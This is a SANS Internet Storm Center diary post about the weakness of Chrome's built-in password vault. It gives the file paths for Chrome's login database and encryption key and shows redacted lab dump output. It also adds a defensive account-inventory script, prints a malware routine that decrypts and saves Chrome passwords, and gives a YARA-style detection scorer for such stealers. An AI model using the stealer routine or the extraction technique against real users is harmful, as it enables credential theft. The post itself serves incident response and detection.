SANS ISC: SANS.edu Internet Storm Center

Use Your Browser Internal Password Vault... or Not?

Published: 2022-05-17
Last Updated: 2022-05-17 09:05:52 UTC
by Xavier Mertens (Version: 1)

Passwords... such a hot topic! Recently, the big players (Microsoft, Apple & Google) announced that they would like to eliminate (or, at least, reduce) the use of classic passwords[1]. In the meantime, passwords remain the most common way to authenticate users against many online services. Modern browsers offer lightweight password management tools ("vaults") that save users' passwords in a central repository, so they don't have to remember them and can follow the golden rule that we, infosec people, have been recommending for a long time: never reuse a password across services. But is it really safe?

I'm involved in a security incident where some administrative accounts for web applications have probably been leaked. During the investigation, I wrote a quick YARA rule to search for the suspicious accounts across files on the developers' computers, and I found a lot of them stored in the Chrome password databases. The default path for this file is:

%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\Login Data

This file is an SQLite database. Fortunately, the passwords stored in this file are encrypted, but they are pretty simple to decrypt, because the AES key used to encrypt them is stored in a JSON file:

%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Local State

I won't explain here how to decode this key and use it to decrypt all the passwords; it is pretty straightforward to do in Python. Here is an example of dumping passwords from a lab Windows machine running Chrome:

C:\Users\xavier\Lab>python dumppass.py
Origin URL: https://selfoss.xxxxxxxxxxxx/
Action URL: https://selfoss.xxxxxxxxxxxx/
Username: xavier
Password: xxxxxxxx
Creation date: 2022-05-17 08:26:16.687562
Last Used: 2022-05-17 08:26:13.094214
==================================================
Origin URL: https://centreon.xxxxxxxxxxxxxxxxxxxxxxxxxx/
Action URL: https://centreon.xxxxxxxxxxxxxxxxxxxxxxxxxx/index.php
Username: admin
Password: xxxxxxxxxxxxxxxxxxxx
Creation date: 2022-05-17 08:49:44.385977
Last Used: 2022-05-17 08:49:41.002207
==================================================
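The same two artefacts can be used defensively. What I needed during the incident was not the secrets but the answer to "which of the leaked accounts are sitting in a browser vault, on which machine, for which site?". The following script is an added example (mine, not the dumppass.py used above) that copies a "Login Data" file, reads only the non-secret columns of the logins table, converts Chrome's timestamps, and reports the entries whose username is on a watchlist. The table and column names origin_url, action_url, username_value, password_value, date_created and date_last_used are Chrome's; the sample database it builds is constructed, with fake hosts and placeholder ciphertext.

```python
import os
import shutil
import sqlite3
import tempfile
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional, Set

# Chrome stores date_created / date_last_used as microseconds since 1601-01-01 UTC
# (the "WebKit time" epoch), which is why the dump above shows microsecond precision.
_WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def webkit_to_datetime(value: int) -> Optional[datetime]:
    """Convert a WebKit timestamp to an aware datetime; Chrome uses 0 for 'never'."""
    if not value:
        return None
    return _WEBKIT_EPOCH + timedelta(microseconds=value)


def datetime_to_webkit(dt: datetime) -> int:
    """Inverse of webkit_to_datetime (timedelta // timedelta is exact integer math)."""
    return (dt - _WEBKIT_EPOCH) // timedelta(microseconds=1)


def inventory_logins(login_data_path: str, watchlist: Set[str]) -> List[Dict]:
    """List saved logins whose username is on the watchlist.

    The file is copied first because Chrome keeps the live database locked, and the
    copy is deleted afterwards. password_value is deliberately never selected:
    scoping an incident needs to know *where* an account is stored, not its secret.
    """
    wanted = {name.lower() for name in watchlist}
    tmpdir = tempfile.mkdtemp(prefix="logindata-")
    try:
        copy = os.path.join(tmpdir, "Login Data.copy")
        shutil.copy2(login_data_path, copy)
        conn = sqlite3.connect(copy)
        try:
            rows = conn.execute(
                "SELECT origin_url, action_url, username_value, date_created, date_last_used "
                "FROM logins"
            ).fetchall()
        finally:
            conn.close()
    finally:
        shutil.rmtree(tmpdir, ignore_errors=True)

    hits = []
    for origin, action, user, created, last_used in rows:
        if (user or "").lower() in wanted:
            hits.append({
                "origin_url": origin,
                "action_url": action,
                "username": user,
                "created": webkit_to_datetime(created),
                "last_used": webkit_to_datetime(last_used),
            })
    return hits


def build_sample_login_data(path: str) -> None:
    """Constructed stand-in for a Chrome 'Login Data' file: real table/column names,
    fake rows. The password_value blobs are placeholders, not real ciphertext."""
    conn = sqlite3.connect(path)
    conn.execute(
        "CREATE TABLE logins (origin_url TEXT, action_url TEXT, username_value TEXT, "
        "password_value BLOB, date_created INTEGER, date_last_used INTEGER)"
    )
    t = datetime_to_webkit(datetime(2022, 5, 17, 8, 49, 44, tzinfo=timezone.utc))
    conn.executemany("INSERT INTO logins VALUES (?, ?, ?, ?, ?, ?)", [
        ("https://centreon.example.test/", "https://centreon.example.test/index.php",
         "admin", b"placeholder-ciphertext", t, t),
        ("https://selfoss.example.test/", "https://selfoss.example.test/",
         "jdoe", b"placeholder-ciphertext", t, 0),
    ])
    conn.commit()
    conn.close()


def run_demo() -> List[Dict]:
    """Build the sample database in a scratch directory and hunt for the 'admin' account."""
    scratch = tempfile.mkdtemp(prefix="chrome-demo-")
    try:
        path = os.path.join(scratch, "Login Data")
        build_sample_login_data(path)
        return inventory_logins(path, {"Admin"})  # matching is case-insensitive
    finally:
        shutil.rmtree(scratch, ignore_errors=True)


if __name__ == "__main__":
    for hit in run_demo():
        print(f"{hit['username']} @ {hit['origin_url']} (created {hit['created']})")
```

On a real host, point inventory_logins at the "Login Data" path given above (every Chrome profile directory has its own copy, not only Default) and feed it the list of account names from the incident; the output tells you which vaults to purge and which credentials to rotate, without ever touching the Local State key.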

Because it's so easy to extract passwords from Chrome, many malware samples implement this technique to exfiltrate your passwords. Here is a sample found this morning on VT (VirusTotal):

def grabPassword(self):
    master_key = self.get_master_key(
        self.appdata+'\\Google\\Chrome\\User Data\\Local State')
    login_db = self.appdata+'\\Google\\Chrome\\User Data\\default\\Login Data'
    login = self.dir+self.sep+"Loginvault1.db"

    shutil.copy2(login_db, login)
    conn = sqlite3.connect(login)
    cursor = conn.cursor()
    with open(self.dir+"\\Google Passwords.txt", "w", encoding="cp437", errors='ignore') as f:
        cursor.execute(
            "SELECT action_url, username_value, password_value FROM logins")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = self.decrypt_val(
                encrypted_password, master_key)
            if url != "":
                f.write(
                    f"Domain: {url}\nUser: {username}\nPass: {decrypted_password}\n\n")
    cursor.close()
    conn.close()
    os.remove(login)
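The routine above is a recognisable fingerprint, and that makes it something to hunt for. The following is an added example (mine, not the author's YARA rule or any vendor's signature) that expresses the pattern as a small YARA-style scorer in Python: each indicator is one thing the stealer cannot do without, and a verdict needs several of them together, so a profile backup script that merely mentions the Chrome directory is not flagged. The indicators are taken from the snippet above; the three sample texts are constructed.

```python
import re
from typing import Dict, List

# Each indicator is something the stealer above needs: Chrome's profile directory,
# the 'Login Data' database, the 'Local State' file holding the encrypted master key,
# the query that pulls password_value out of the logins table, and the
# copy-the-locked-database-then-open-it pattern.
STEALER_INDICATORS: Dict[str, "re.Pattern"] = {
    "chrome_profile_path": re.compile(r"Google\\+Chrome\\+User Data", re.IGNORECASE),
    "login_data_file": re.compile(r"\bLogin Data\b", re.IGNORECASE),
    "local_state_file": re.compile(r"\bLocal State\b", re.IGNORECASE),
    "logins_password_query": re.compile(
        r"password_value.{0,200}?FROM\s+logins", re.IGNORECASE | re.DOTALL),
    "copy_then_open_db": re.compile(
        r"shutil\.copy\w*\(.{0,400}?sqlite3\.connect\(", re.DOTALL),
}

# Like a YARA condition ("3 of them"): the path alone is innocent, backup tools
# touch it too; three independent indicators together are hard to explain away.
MIN_INDICATORS = 3


def scan_text(text: str) -> List[str]:
    """Return the names of all indicators present in a script or decompiled sample."""
    return [name for name, pattern in STEALER_INDICATORS.items() if pattern.search(text)]


def looks_like_browser_stealer(text: str) -> bool:
    return len(scan_text(text)) >= MIN_INDICATORS


# Constructed samples: a condensed version of the stealer routine shown above,
# a harmless profile backup script, and an unrelated sqlite inventory tool.
SAMPLE_STEALER = r'''
master_key = self.get_master_key(self.appdata + '\\Google\\Chrome\\User Data\\Local State')
login_db = self.appdata + '\\Google\\Chrome\\User Data\\default\\Login Data'
shutil.copy2(login_db, login)
conn = sqlite3.connect(login)
cursor.execute("SELECT action_url, username_value, password_value FROM logins")
'''

SAMPLE_BACKUP = r'''
src = os.path.expandvars(r"%LOCALAPPDATA%\Google\Chrome\User Data")
shutil.copytree(src, dst)
'''

SAMPLE_INVENTORY = r'''
conn = sqlite3.connect("inventory.db")
rows = conn.execute("SELECT hostname, last_seen FROM assets").fetchall()
'''


if __name__ == "__main__":
    for label, sample in (("stealer", SAMPLE_STEALER), ("backup", SAMPLE_BACKUP),
                          ("inventory", SAMPLE_INVENTORY)):
        print(f"{label}: {looks_like_browser_stealer(sample)} {scan_text(sample)}")
```

The same five strings translate directly into a YARA rule with a "3 of them" condition if you prefer to run it with the rest of your rule set; the Python version is here so the scoring logic can be read and tested in one place.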

My recommendation is not to store your passwords in these browser vaults but to use a real password manager instead! Most of them offer plugins for all common browsers and provide the same ease of use. Stay safe!

[1] https://www.bleepingcomputer.com/news/security/microsoft-apple-and-google-to-support-fido-passwordless-logins/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant